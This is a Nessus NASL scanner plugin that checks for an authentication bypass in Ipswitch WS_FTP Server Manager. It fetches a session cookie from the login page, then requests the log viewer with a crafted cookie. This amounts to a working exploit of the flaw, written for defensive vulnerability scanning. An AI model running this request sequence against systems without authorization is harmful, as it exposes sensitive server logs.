#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(30208);
  script_version("$Revision: 1.1 $");

  script_bugtraq_id(27654);
  script_xref(name:"Secunia", value:"28822");

  script_name(english:"Ipswitch WS_FTP Server Manager Authentication Bypass Vulnerability");
  script_summary(english:"Tries to view logs");

  desc = "
Synopsis :

The remote web server is affected by an authentication bypass
vulnerability. 

Description :

The remote host is running WS_FTP Server Manager, also known as WS_FTP
WebService, a web-based administration tool included, for example,
with Ipswitch WS_FTP Server. 

The version of WS_FTP Server Manager installed on the remote host
allows an attacker by bypass authentication and gain access to ASP
scripts in the '/WSFTPSVR/FTPLogServer' folder by first calling the
login script to obtain a session cookie.  By leveraging this issue, an
attacker can view log entries collected by the Logger Server, which
may contain sensitive information.  He can not, though, otherwise gain
administrative control of the affected application. 

See also :

http://aluigi.altervista.org/adv/wsftpweblog-adv.txt
http://archives.neohapsis.com/archives/bugtraq/2008-02/0057.html
http://archives.neohapsis.com/archives/bugtraq/2008-02/0068.html

Solution :

Unknown at this time. 

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);


# Make sure the banner is from Ipswitch.
banner = get_http_banner(port:port);
if (
  !banner ||
  "Server: Ipswitch" >!< banner
) exit(0);


# First, get a cookie.
req = http_get(
  item:"/WSFTPSVR/FTPLogServer/login.asp", 
  port:port
);
res = http_keepalive_send_recv(port:port, data:req, fetch404:TRUE);
if (res == NULL) exit(0);
if ('Set-Cookie: Ipswitch_WSFTP=' >!< res) exit(0);

cookie = NULL;
pat = "^Set-Cookie: Ipswitch_WSFTP=([^;]+); *path=";
matches = egrep(pattern:pat, string:res);
if (matches)
{
  foreach match (split(matches))
  {
    match = chomp(match);
    item = eregmatch(pattern:pat, string:match);
    if (!isnull(item))
    {
      cookie = item[1];
      break;
    }
  }
}
if (isnull(cookie)) exit(0);


# Now try to pull up the log viewing form.
req = http_get(item:"/WSFTPSVR/FTPLogServer/LogViewer.asp", port:port);
req = str_replace(
  string:req,
  find:"User-Agent:",
  replace:string(
    "Cookie: Ipswitch_WSFTP=", cookie, "; redwood=sRoot=/WSFTPSVR;\r\n",
    "User-Agent:"
  )
);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (res == NULL) exit(0);


# There's a problem if we are logged in.
if (
  'Logged in as: <b>localhostnull' >< res &&
  'action="LogViewerDetails.asp"' >< res
) security_warning(port);
